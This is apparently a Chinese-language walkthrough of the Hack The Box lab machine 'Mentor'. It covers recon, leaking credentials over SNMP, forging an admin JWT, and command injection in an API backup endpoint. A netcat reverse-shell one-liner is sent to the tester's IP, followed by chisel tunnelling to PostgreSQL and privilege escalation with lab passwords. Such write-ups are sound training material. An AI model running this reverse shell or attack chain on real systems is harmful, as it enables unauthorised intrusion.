HTB靶机:Mentor

靶机信息:

image-20221226075450703

信息收集:

端口扫描:

rustscan -a 10.10.11.193 -- -sC -sV -Pn  -oN nmap
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 c7:3b:fc:3c:f9:ce:ee:8b:48:18:d5:d1:af:8e:c2:bb (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBO6yWCATcj2UeU/SgSa+wK2fP5ixsrHb6pgufdO378n+BLNiDB6ljwm3U3PPdbdQqGZo1K7Tfsz+ejZj1nV80RY=
|   256 44:40:08:4c:0e:cb:d4:f1:8e:7e:ed:a8:5c:68:a4:f7 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJjv9f3Jbxj42smHEXcChFPMNh1bqlAFHLi4Nr7w9fdv
80/tcp open  http    syn-ack Apache httpd 2.4.52
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET
| http-server-header: 
|   Apache/2.4.52 (Ubuntu)
|_  Werkzeug/2.0.3 Python/3.6.9
|_http-title: MentorQuotes
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

80:

添加hosts访问,感觉像一个blog网站。

image-20221226075810134

子域名扫描:

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://mentorquotes.htb/" -H 'Host: FUZZ.mentorquotes.htb' -fc 302 -mc all

这里扫描出来一个404添加hosts访问没有结果。

image-20221226080519959

image-20221226080739897

目录扫描:

api.mentorquotes.htb子域名扫描发现存在目录。

dirsearch -u http://api.mentorquotes.htb

image-20221226081127731

docs目录:

docs是API文档,可以得到网站管理员的邮箱:james@mentorquotes.htb

image-20221226081356136

这里未修复时,可以通过冒充james进行注册,获取到管理员cookies。从而进行下一步。修复后,这里是通过snmp获取到james的登录密码然后获取管理员cookies。感觉不如不修复。

snmpwalk:

sudo nmap -sU -Pn 10.10.11.193

image-20221226081957285

snmpwalk -v2c -c internal mentorquotes.htb

image-20221226083929216

找到密码:kj23sadkj123as0-d213

image-20221226092934346

使用api的登录接口,改包获取到cookies

image-20221226085335761

image-20221226085306095

"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0BtZW50b3JxdW90ZXMuaHRiIn0.peGpmshcF666bimHkYIBKQN7hj5m785uKcjwbD--Na0"

image-20221226085658736

现在访问admin,得到check和backup:

image-20221226085823203

check还没实现,backup需要有效的json post参数,构造有效参数,响应内容只有Done

这里是post请求

image-20221226090244930

命令注入:

现path参数的命令注入:

image-20221226091354593

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.59 4444 >/tmp/f;

image-20221226091551252

postgresql

发现该shell处在docker容器中,发现该容器开的pstgresql

image-20221226092645033

image-20221226092725425

# Database url if none is passed the default one is used                     
DATABASE_URL = os.getenv("DATABASE_URL", "postgresql://postgres:postgres@172.22.0.1/mentorquotes_db")

端口转发:

#kali
./chisel server --reverse --port 8000
#目标
./chisel client -v 10.10.14.59:8000 R:5432:172.22.0.1:5432

image-20221226094040216

psql -h 10.10.14.59 -U "postgres" -p 5432

image-20221226101208445

hash解密获得svc:123meunomeeivani.

连接获取到svc用户flag

image-20221226101448035

提权:

这里可以找到james的密码:SuperSecurePassword123__

james用户可以sudo执行sh

cat /etc/snmp/snmpd.conf

image-20221226102401889

image-20221226102631378

结尾:

image-20221226102852173